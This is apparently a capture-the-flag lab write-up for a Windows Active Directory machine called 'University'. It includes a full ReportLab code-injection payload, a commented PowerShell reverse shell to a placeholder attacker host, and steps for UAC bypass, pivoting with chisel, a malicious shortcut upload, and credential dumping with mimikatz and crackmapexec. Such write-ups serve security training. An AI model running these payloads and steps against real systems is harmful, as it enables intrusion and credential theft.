# University

# 1. Enumeration

Start Enumerating using nmap, there are multiple ports open as is normal in windows machines

![image.png](University%2012db95255291804a8456f459213fed2b/image.png)

First, let’s check the web application running on port 80

![image.png](University%2012db95255291804a8456f459213fed2b/image%201.png)

There is an university web page, we can register as professors, but first we will need approval for admins 

![image.png](University%2012db95255291804a8456f459213fed2b/image%202.png)

According with the situation, the best option would be register ourselves as students

![image.png](University%2012db95255291804a8456f459213fed2b/image%203.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%204.png)

Now, we discover another sign in option using signed certificates, but for now we are just going to sign with username and password

![image.png](University%2012db95255291804a8456f459213fed2b/image%205.png)

Once inside, we have several functionalities that we could to test

![image.png](University%2012db95255291804a8456f459213fed2b/image%206.png)

We can even request a signed certificate

![image.png](University%2012db95255291804a8456f459213fed2b/image%207.png)

But for now we are going to focus on this CKEditor, checking the source code, it is running CKEditor and it has a XSS vulnerability

![image.png](University%2012db95255291804a8456f459213fed2b/image%208.png)

# 2. User flag - Priv esc (Unintended)

But reviewing the source code, we found a new functionality that we can trigger calling the `/account/profile/pdf` endpoint through a GET request

![image.png](University%2012db95255291804a8456f459213fed2b/image%209.png)

Basically it takes the whole information we have in our profile, and it creates a .pdf file 

![image.png](University%2012db95255291804a8456f459213fed2b/image%2010.png)

We can inspect metadata information inside of the pdf file to discover that it is creates thanks to ReportLab, which is a python library with a known vulnerability

![image.png](University%2012db95255291804a8456f459213fed2b/image%2011.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2012.png)

Luckily or unluckily this version of report lab is vulnerable

![image.png](University%2012db95255291804a8456f459213fed2b/image%2013.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2014.png)

But after a while, the payload is interpreted and executed but there is something wrong with it because we cannot get RCE at all. After a little research we found that the problem resided on the False statement, it is not well interpreted by the engine i think it has Jinja or something like that behind so we just change `False` to `1=0` , it should works.

```jsx
<para><font color="[[ 
#Gets global from pow
	getattr(
		pow,
		Word('__globals__')
	)['os'].system('payload') #Execute the payload 
#creates a list 
for Word in [
	#It creates new classes dinamically
	orgTypeFun('Word',(str), {
		'mutated':1, 
		'startswith': lambda self,x: 1=0,
		'__eq__':lambda self, x: 
			self.mutate() and #Evaluates mutate
			self.mutate < 0 and 
			str(self) == x, 
		'mutate':lambda self: { #Here mutates decrease
			setattr(self,'mutated', self.mutated -1)
		}, 
		'__hash__': lambda self: hash(str(self))
		})
	]] 
	for orgTypeFun in [type(type(1))]
] and 'red'">
anything
</font></para>
```

First save the reverse shell into the system 

![image.png](University%2012db95255291804a8456f459213fed2b/image%2015.png)

Then execute it using powershell

![image.png](University%2012db95255291804a8456f459213fed2b/image%2016.png)

```powershell
#Stablishin a connection
$TCPClient = New-Object Net.Sockets.TCPClient('x.x.x.x', pppp);
#Getting network workflow
$NetworkStram = $TCPClient.GetStream();
#Creates a writer to send information through the network flow
$StreamWriter = New-Object IO.StreamWriter($NetworStream);
#Function to write through the network flow (sending information)
function WriteToStream ($String) {
	#Inizializing a buffer of bytes
	[byte[]]
	$Script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};
	#Write informatio
	$StreamWriter.Write($String + 'SHELL> ');
	#Making sure the information is sent
	$StreamWriter.Flush()
}
#Calls the function
WriteToStream '';
#Receiving information, read throught the network flow
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0){
	#Read the information received in UTF8
	$Command = ([text.encoding]::UTF8).GetString($Buffer, 0. $BytesRead -1);
	$Output = try {
	#Try to execute commands and capture errors
		Invoke-Expression $Command 2>&1 | Out-String
	}catch{
	#If there is an error, takes the error and converting it to string
		$_ | Out-String
	}WriteToStream ($Output) #Write the output to send it 
}
$StreamWriter.Close()
```

![image.png](University%2012db95255291804a8456f459213fed2b/image%2017.png)

Now we have a shell as wao

![image.png](University%2012db95255291804a8456f459213fed2b/image%2018.png)

Here we have sensible information and files of the Certification Authotiry

![image.png](University%2012db95255291804a8456f459213fed2b/image%2019.png)

We also have some certificates

![image.png](University%2012db95255291804a8456f459213fed2b/image%2020.png)

But at the moment to try to log in with them we have an error message

![image.png](University%2012db95255291804a8456f459213fed2b/image%2021.png)

We keep it up digging inside, there is a sqlite file

![image.png](University%2012db95255291804a8456f459213fed2b/image%2022.png)

We have tokens, and hashes

![image.png](University%2012db95255291804a8456f459213fed2b/image%2023.png)

But first we saw before and automation made with powershell

![image.png](University%2012db95255291804a8456f459213fed2b/image%2024.png)

It is zipping the backup but is disclosing Wao’s password

![image.png](University%2012db95255291804a8456f459213fed2b/image%2025.png)

Just for curiosity we can try to bypass user account control UAC 

![image.png](University%2012db95255291804a8456f459213fed2b/image%2026.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2027.png)

Create a revshell and try to execute it with runascs

![image.png](University%2012db95255291804a8456f459213fed2b/image%2028.png)

Set the listener

![image.png](University%2012db95255291804a8456f459213fed2b/image%2029.png)

Uploading the reverse shell

![image.png](University%2012db95255291804a8456f459213fed2b/image%2030.png)

Uploading RunasCs

![image.png](University%2012db95255291804a8456f459213fed2b/image%2031.png)

Use credentials found, and bypassuac and logon type 5 which means service logon, simulating a service running with the machine is started

![image.png](University%2012db95255291804a8456f459213fed2b/image%2032.png)

Now we have different privileges, some of them are disabled but we can use tools like godpotato to abuse them

![image.png](University%2012db95255291804a8456f459213fed2b/image%2033.png)

In this case we are going to take advantage of Metasploit `seimpersonateprivilege` 

![image.png](University%2012db95255291804a8456f459213fed2b/image%2034.png)

System achieved, now just get hashes to log in as administrator

![image.png](University%2012db95255291804a8456f459213fed2b/image%2035.png)

Machines pwned!!!!

# Intended

The procedure shown above we presented an unintended way, but as we want to take advantage of the knowledge this machine could offers let's take a look at the right way.

We need to start in the way which a user has access to the certification authority which is in charge of sign certificates to make professor account access to university web application 

![image.png](University%2012db95255291804a8456f459213fed2b/image%2036.png)

First we tried to create our own certificate, but it didn't work because those certificates has specific attributes that we may no taking account

![image.png](University%2012db95255291804a8456f459213fed2b/image%2037.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2038.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2039.png)

That's why it is a better option to take an existing certificate a sign it.

![image.png](University%2012db95255291804a8456f459213fed2b/image%2040.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2041.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2042.png)

We got martin certificate, now we can log in as him.

![image.png](University%2012db95255291804a8456f459213fed2b/image%2043.png)

Now we can see there are some new functionalities, but if we check in the machine we are not going to see this user, could it be a rabbit hole? 

With `Get-ADComputer -Filter *` we got information about other machines running in the active directory domain

LAB-2 and WS-3 Are machines where we have direct connection in the machine which is the DC machine

![image.png](University%2012db95255291804a8456f459213fed2b/image%2044.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2045.png)

LAB-2 seems to be a linux machine

WS-3 seems to be a windows machine

![image.png](University%2012db95255291804a8456f459213fed2b/image%2046.png)

If we want to know more about those machine we could try to log on there with wao credentials, but before we need to set the corresponding pivoting and forwarding environment.

I don’t think next step is fully necessary in this machine but it is better to be sure we are sign-in to DC machine

![image.png](University%2012db95255291804a8456f459213fed2b/image%2047.png)

Now set the chisel server with 

```python
#Establishing a proxy server allowing to access to restricted network segements 
#Thanks to -reverse redirection
chisel server --socks5 -reverese -p 5555
```

![image.png](University%2012db95255291804a8456f459213fed2b/image%2048.png)

Now set the client reversing network stream

![image.png](University%2012db95255291804a8456f459213fed2b/image%2049.png)

Be sure `/etc/proxychains4.conf` has proper configuration to intercept that connection and redirect it to that port

![image.png](University%2012db95255291804a8456f459213fed2b/image%2050.png)

Now we have made that pivoting movement and we have got access to other machines, first one `LAB-2` which is a Linux machine, didn’t have anything interesting, we could check a little bit deeper how the web application works but we are going to focus on WS-3 machine

![image.png](University%2012db95255291804a8456f459213fed2b/image%2051.png)

Logon with wao creds to WS-3 machine

![image.png](University%2012db95255291804a8456f459213fed2b/image%2052.png)

In the desktop we have a clue for the privilege escalation, and some other information about the infrastructure we are handle with, also we don’t have privileges here let’s find a way to escalate as martin here, taking account that we have access to him in the web application and his profile is present as a user in this machine

![image.png](University%2012db95255291804a8456f459213fed2b/image%2053.png)

checking http paths, there is a upload part, as martin we could trigger something

![image.png](University%2012db95255291804a8456f459213fed2b/image%2054.png)

create a temp directory and set a rev shell executing netcat

![image.png](University%2012db95255291804a8456f459213fed2b/image%2055.png)

We are redirecting to DC machine because it will be set to redirect traffic to WS-3 machine

![image.png](University%2012db95255291804a8456f459213fed2b/image%2056.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2057.png)

We can upload courses into the web application as martin, but those files need to be signed with the private key of that user to match keys and be sure that users is uploading a valid file

Generate a key pair

![image.png](University%2012db95255291804a8456f459213fed2b/image%2058.png)

Upload the public key 

![image.png](University%2012db95255291804a8456f459213fed2b/image%2059.png)

Now we can create a malicious course, it would be a shortcut.url which will execute the rev shell when it is handled

![image.png](University%2012db95255291804a8456f459213fed2b/image%2060.png)

zip the file 

![image.png](University%2012db95255291804a8456f459213fed2b/image%2061.png)

Now we need to forward just one port, this is because we need to listen in our local machine using proxychains, we kill the session forwarding all the traffic because we don’t need to logon as wao in WS-3 anymore

![image.png](University%2012db95255291804a8456f459213fed2b/image%2062.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2063.png)

Now that everything is set, we proceed to upload the .zip file that will trigger our exploit, to make this possible get a private key signed file

![image.png](University%2012db95255291804a8456f459213fed2b/image%2064.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2065.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2066.png)

We had 500 response but we have received connection as martin.t

![image.png](University%2012db95255291804a8456f459213fed2b/image%2067.png)

Finally the user flag

![image.png](University%2012db95255291804a8456f459213fed2b/image%2068.png)

As we saw before we are in a machine that hasn’t been uploaded since 2023, that means that probably is vulnerable to CVE-2023-21746 which takes advantage of NTLM authentication, we will use a automation script with elevated privileges to get SYSTEM access

![image.png](University%2012db95255291804a8456f459213fed2b/image%2069.png)

Execute the PoC as shown below, basically we write in a file and then activate an instance of that object, the machine is pretty tricky we might need to do it various times.
Before executing the .exe we need to take account that we have to redirect another port to WS-3 to get access

![image.png](University%2012db95255291804a8456f459213fed2b/image%2070.png)

Now we are administrators, but there’s no root flag yet

![image.png](University%2012db95255291804a8456f459213fed2b/image%2071.png)

Upload mimikatz

![image.png](University%2012db95255291804a8456f459213fed2b/image%2072.png)

We tried to dump sam hashes, secrets and logonpasswords but anything there

![image.png](University%2012db95255291804a8456f459213fed2b/image%2073.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2074.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2075.png)

we need to set and upload the privilege before, use:

```python
privilege::debug
token::elevate
```

![image.png](University%2012db95255291804a8456f459213fed2b/image%2076.png)

Now dump secrets, default password got it

![image.png](University%2012db95255291804a8456f459213fed2b/image%2077.png)

After a guessing or spraying process with crackmapexec the one you prefer, we realize those are useful creds for Choco.L, logon as him and check privileges in DC

![image.png](University%2012db95255291804a8456f459213fed2b/image%2078.png)

That means Chocho is a privileged user in here who can dump hashes using `—ntds` with crackmapexec to get information from ntds.dir which is an Active Directory database where creds are stored

![image.png](University%2012db95255291804a8456f459213fed2b/image%2079.png)

![image.png](University%2012db95255291804a8456f459213fed2b/image%2080.png)

---

Finally machine pwned!!!